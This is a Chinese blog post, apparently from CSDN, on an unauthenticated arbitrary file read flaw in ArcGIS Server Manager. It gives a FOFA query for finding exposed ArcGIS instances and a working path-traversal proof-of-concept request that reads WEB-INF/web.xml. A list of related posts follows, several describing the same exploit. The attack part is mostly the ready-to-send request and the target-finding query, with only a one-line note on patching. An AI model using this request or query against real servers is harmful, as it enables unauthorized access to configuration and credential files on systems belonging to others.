ArcGIS地理信息系统任意文件读取

原创 已于 2025-05-15 13:17:05 修改 · 421 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#arcgis #web安全 #安全威胁分析 #漏洞复现 #漏洞利用 #网络安全

于 2025-05-15 11:21:41 首次发布

系统描述

ArcGIS地理信息系统存在一个严重的任意文件读取,允许未经身份验证的攻击者读取系统中的重要文件。攻击者可以通过发送特定的HTTP GET请求,利用路径遍历技术访问系统敏感文件,如WEB-INF/web.xml。利用方式简单,攻击者只需构造特定的请求头,即可绕过身份验证,获取系统内部文件内容。建议用户及时更新系统补丁,或采取其他安全措施,以防止潜在的数据泄露和系统风险。

fofa

app="esri-ArcGIS"

poc

GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.0
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
ArcGIS地理空间平台 manager 任意文件读取漏洞复现
iSee857的博客
11-07 1320
开发,旨在为专业人士和组织提供全面的地理信息系统(GIS)功能。ArcGIS通过集成和连接地理环境中的数据,支持创建、管理、分析、映射和共享各种类型的数据,从而帮助组织在决策制定中占据领先地位‌。漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。ArcGIS地理空间平台 /arcgis/manager接口存在任意。在处理客户端输入的参数时,进行严格的验证和过滤,防止未授权的文件访问。‌是一个综合的地理空间平台,由。
ArcGIS 地理信息系统 任意文件读取漏洞复现
0xSec
11-04 2230
ArcGIS地理信息系统 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现ArcGIS地理空间平台manager任意文件读取漏洞
m0_46381222的博客
11-26 2484
漏洞复现ArcGIS地理空间平台manager任意文件读取漏洞
ArcGIS nc文件读取,定义坐标及修改投影
优快云chun的博客
10-08 2万+
记录一下操作过程,害怕之后忘记。目前很多类型文件均为nc格式,那么nc格式数据如何在ArcGIS软件读取,如何修改成自己想要的地理坐标和投影坐标,下面进行展示。查看TIFF文件显示是十进制度的坐标表示形式,先将影像定义GCS-WGS-1984的地理坐标。
ArcGIS地理空间平台 任意文件读取漏洞复现及POC
mashiro_hibiki的博客
11-06 2624
高质量安全知识星球社区,致力于漏洞挖掘,渗透技巧,安全资料,星球承诺会持续更新0/1/NDay及对应的批量利用工具,团队内部漏洞库,内外网攻防技巧,你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。分享行业内最新动态,解答交流各类技术问题。,安全技术水平的催化者,星球针对成员的技术问题,快速提供思考方向及解决方案,并为星友提供多种方向的学习资料、安全工具、POC&EXP以及各种学习笔记等,以引导者和催化剂的方式助力安全技术水平的提升。
Arcgis读取nc文件(NetCDF文件)使用转栅格工具箱强退报错问题解决方法
reznov233的博客
10-29 4854
arcgis10.2读取nc文件一直强退报错
精选资源
ArcGIS地理空间平台任意文件读取漏洞及其复现方法详解与安全测试案例
最新发布
01-03
内容概要:本文主要介绍了一种针对Esri公司ArcGIS地理空间平台存在的任意文件读取漏洞,提供了详细的漏洞重现步骤和具体实例。文中通过FOFA语句进行资产定位并利用nuclei工具包制作了一个专门用于检测该漏洞安全...
ArcGIS地理空间平台manager存在任意文件读取漏洞
缘梦未来的博客
12-15 1012
ArcGIS 是一个面向专业人士和组织的综合地理空间平台。 它是领先的地理信息系统 (GIS) 技术。 ArcGIS 由 Esri 构建,通过地理环境集成和连接数据。 它为创建、管理、分析、映射和共享所有类型的数据提供了世界领先的功能。 使用 ArcGIS 在地理环境中理解和分析数据的组织具有明显的优势和决策制定领先地位。
学习总结之任意文件读取漏洞(网站敏感数据泄露)
weixin_63694057的博客
06-17 2203
以下内容是我在实践过程中找到的一个任意文件读取漏洞,通过DirBuster发现该域名下存在.zip文件,通过在域名路径下加上该文件即可将这个压缩包下载到我的本地,然后解压发现是该网站的源码,这个漏洞对该企业网站来说影响是很大的,我也提交了该漏洞。原理:攻击者使用各种攻击方式扫描目标网站,寻找未授权访问的漏洞,然后攻击者利用这些漏洞发送特殊请求,获取到网站上存在的敏感信息或者文件;还有phpinfo文件,能够获取到服务器真实IP,一些配置信息如中间件,系统版本,数据库版本等,以及获取到网站根目录。
任意文件读取与下载漏洞
西电卢本伟的博客
04-07 9764
文件读取漏洞,文件下载漏洞,文件包含漏洞三者结合,靶场练习
任意文件读取/下载漏洞总结
热门推荐
未完成的歌~的博客
04-01 2万+
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
ArcGIS Server Manager服务的web.xml文件任意下载泄露漏洞
我要一步一步从菜鸟做到好手.
06-18 3303
在tomcat下的manager应用配置文件(即webapps\arcgis#manager\WEB-INF\web.xml,也就是被暴露的文件本身)中,存在一条对虚拟路径“3370/*”进行解析的filter-mapping节点,该节点对匹配的访问执行“BuildNumFilter”过滤器,允许通过虚拟路径访问该应用下的子文件夹。arcgis#manager下的所有文件,比如新建一个 test.txt、doc、config 统统都能打开或者下载,因此需要对web.xml做过滤。
任意文件读取漏洞
m0_57276420的博客
04-08 6604
任意文件读取漏洞(Arbitrary File Read Vulnerability)是指攻击者可以通过web应用程序读取任意文件而不受访问控制限制的漏洞。这种漏洞可能导致敏感信息泄露、系统崩溃等问题。攻击者可以利用任意文件读取漏洞访问服务器上的任意文件,包括密码文件、配置文件等,从而获取系统权限和敏感信息。此外,攻击者还可以利用漏洞读取应用程序中的敏感数据,如数据库凭据、API密钥等。任意文件读取漏洞通常是由于未正确验证用户输入所导致的。
[任意文件上传、包含、读取]
个人学习参考
03-09 1278
本篇文章仅作为本人学习笔记文件上传是Web 应用的必备功能之一,比如上传头像、上传附件共享⽂件等。如果服务器配置不当或者没有进行足够的过滤,Web 用户就可以上传任意文件,包括恶意脚本文件、exe 程序等,这就造成了文件上传漏洞。
Web漏洞-任意文件读取漏洞
知世郎
09-01 1141
原理:任意文件读取是属于文件操作漏洞的一种,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取的文件没有经过校验或者校验不严格,用户可以控制这个变量或者变量读取任意文件。一般任意文件读取漏洞可以读取配置信息甚至系统重要文件。
File Read| file-read| 任意文件读取
薛定谔嘚喵博客
05-05 1116
任意文件读取的危害往往大于目录遍历漏洞任意文件读取不仅会泄露网站的结构目录,一些敏感文件还会被通过构造特殊的字符结构下载下来,比如说…任意文件读取是属于文件操作漏洞的一种,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取的文件没有经过校验或者校验不严格,用户可以控制这个变量或者变量读取任意文件。7、读取web应用日志文件,中间件的日志文件,其他程序的日志,系统日志等(可以网站后台地址、api接口、备份、等等敏感信息)
任意文件读取漏洞复现
weixin_58954236的博客
09-02 7341
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是漂代码文件,配置文件,敏感文件等等。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
基于ArcGIS Engine的缓冲区分析实现
ArcGIS Engine作为Esri公司推出的一款用于构建地理信息系统(GIS)应用程序的开发平台,广泛应用于各类空间数据处理与地图分析任务中。标题“ArcGIS Engine做缓冲区分析”明确指出了该文件的核心内容:利用ArcGIS ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值